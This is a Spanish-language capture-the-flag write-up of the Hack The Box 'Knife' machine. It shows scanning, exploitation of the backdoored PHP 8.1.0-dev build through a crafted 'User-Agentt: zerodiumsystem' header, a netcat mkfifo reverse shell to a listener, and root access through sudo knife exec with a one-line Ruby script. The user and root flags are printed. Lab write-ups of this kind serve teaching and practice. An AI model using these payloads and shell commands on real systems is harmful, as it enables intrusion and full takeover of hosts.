This page looks best with JavaScript enabled

Hack The Box - Knife

 ·  ☕ 5 min read  ·  ✍️ c1sco0

Knife es una maquina de HackTheBox, en esta maquina encontramos que esta utilizando una version en desarrollo de PHP la cual fue afectada con un backdoor, por medio de este logramos ingresar tras ejecutar una shell inversa. Finalmente escalamos privilegios utilizando los permisos de la herramienta Knife con un script en ruby.

Nombre Knife box_img_maker
OS Linux
Puntos 20
Dificultad Facil
IP 10.10.10.242
Maker

MrKN16H7

Matrix
{
   "type":"radar",
   "data":{
      "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
      "datasets":[
         {
            "label":"User Rate",  "data":[4.4, 3.8, 4.9, 5.1, 6.2],
            "backgroundColor":"rgba(75, 162, 189,0.5)",
            "borderColor":"#4ba2bd"
         },
         { 
            "label":"Maker Rate",
            "data":[0, 0, 0, 0, 0],
            "backgroundColor":"rgba(154, 204, 20,0.5)",
            "borderColor":"#9acc14"
         }
      ]
   },
    "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
            "angleLines":{"color":"rgba(255, 255, 255,0.6)"},
            "gridLines":{"color":"rgba(255, 255, 255,0.6)"}
        }
    }
}

Recon

NMAP

Escaneo de puertos con nmap nos muestra el puerto http (80) y el puerto ssh (22) abiertos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
# Nmap 7.91 scan initiated Wed May 26 19:44:57 2021 as: nmap -Pn -sV -sC -p22,80 -oN scan_ports 10.10.10.242
Nmap scan report for 10.10.10.242 (10.10.10.242)
Host is up (0.098s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 26 19:45:11 2021 -- 1 IP address (1 host up) scanned in 13.39 seconds

HTTP

Encontramos una pagina aparentemente estatica.
image

GOBUSTER

Utilizamos gobuster para busqueda de directorios y archivos, pero solo muestra una direccion ya conocida y otra, que no podemos acceder de formar remota.

1
2
3
π ~/htb/knife ❯ gobuster dir -u http://10.10.10.242/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 30 -x php,html,txt,json,xml
/index.php            (Status: 200) [Size: 5815]
/server-status        (Status: 403) [Size: 277]

HEADERS

En los headers del sitio encontramos PHP/8.1.0-dev, al investigar esta version vemos un exploit que permite la ejecucion de comandos a traves de un Header el cual esta relacionado a un backdoor que recientemente fue detectado en un commit del repositorio de PHP en desarrollo, lo que permite ejecutar comandos de forma remota.

1
2
3
4
5
HTTP/1.1 200 OK
Date: Thu, 27 May 2021 00:22:54 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8

USER - JAMES

La ejecucion de comandos se dá tras enviar un comando en el header User-Agentt: zerodiumsystem('whoami'); con lo cual se logra ejecutar comandos y muestra su salida. En la salida de curl vemos la ejecucion del comando whoami al usuario “James”.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
π ~/htb/knife ❯ curl -s http://10.10.10.242/ -H "User-Agentt: zerodiumsystem('whoami');"| html2text
james
    * About EMA
    * /
    * Patients
    * /
    * Hospitals
    * /
    * Providers
    * /
    * E-MSO

***** At EMA we're taking care to a whole new level . . . *****
****** Taking care of our  ******

Ejecutamos una shell inversa y logramos obtener una shell y la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 8081 >/tmp/f
james@knife:/$ whoami
whoami
james
james@knife:/$ cd
cd
james@knife:~$ ll
ll
total 40
drwxr-xr-x 5 james james 4096 May 18 13:20 ./
drwxr-xr-x 3 root  root  4096 May  6 14:44 ../
lrwxrwxrwx 1 james james    9 May 10 16:23 .bash_history -> /dev/null
-rw-r--r-- 1 james james  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 james james 3771 Feb 25  2020 .bashrc
drwx------ 2 james james 4096 May  6 14:45 .cache/
drwxrwxr-x 3 james james 4096 May  6 16:32 .local/
-rw-r--r-- 1 james james  807 Feb 25  2020 .profile
-rw-rw-r-- 1 james james   66 May  7 14:16 .selected_editor
drwx------ 2 james james 4096 May 18 13:20 .ssh/
-r-------- 1 james james   33 May 26 20:25 user.txt
james@knife:~$ cat user.txt
cat user.txt
7b3e1804cce95710f8730ca6fb1a086f
james@knife:~$

PRIVILEGE ESCALATION

Ejecutando sudo -l -l vemos que tenemos permisos root (sudo) para ejecutar el comando knife.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
james@knife:~$ sudo -l -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
	/usr/bin/knife
james@knife:~$ file /usr/bin/knife
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife
james@knife:~$ file /opt/chef-workstation/bin/knife
/opt/chef-workstation/bin/knife: a /opt/chef-workstation/embedded/bin/ruby --disable-gems script, ASCII text executable
james@knife:~$ ls -lah /opt/chef-workstation/bin/knife
-rwxr-xr-x 1 root root 12K Feb 15 22:06 /opt/chef-workstation/bin/knife
james@knife:~$

Utilizamos knife exec con un script para obtener una shell root y la flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
james@knife:~$ echo "system('/bin/bash')" > script.rb
james@knife:~$ cat script.rb
system('/bin/bash')
james@knife:~$ sudo /usr/bin/knife exec script.rb
root@knife:/home/james# whoami
root
root@knife:/home/james# id
uid=0(root) gid=0(root) groups=0(root)
root@knife:/home/james# cd
root@knife:~# ll
total 56
drwx------  7 root root 4096 May 18 13:26 ./
drwxr-xr-x 20 root root 4096 May 18 13:25 ../
lrwxrwxrwx  1 root root    9 May  8 16:43 .bash_history -> /dev/null
-rw-r--r--  1 root root 3137 May  7 11:12 .bashrc
drwx------  2 root root 4096 May  7 14:47 .cache/
drwx------  3 root root 4096 May 18 13:20 .chef/
-rwxr-xr-x  1 root root  105 May  8 16:46 delete.sh*
drwxr-xr-x  3 root root 4096 May  7 11:13 .local/
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-------  1 root root 1024 May  8 11:13 .rnd
-r--------  1 root root   33 May 26 20:25 root.txt
-rw-r--r--  1 root root   66 May  8 16:46 .selected_editor
drwxr-xr-x  3 root root 4096 May  6 14:44 snap/
drwx------  2 root root 4096 May  6 14:44 .ssh/
-rw-------  1 root root 2413 May 18 13:25 .viminfo
root@knife:~# cat root.txt
e2eee2ca199ac8ea06e9578969576706
root@knife:~#
Share on

c1sco0
WRITTEN BY
c1sco0
Pentester wannabe

HTB: Knife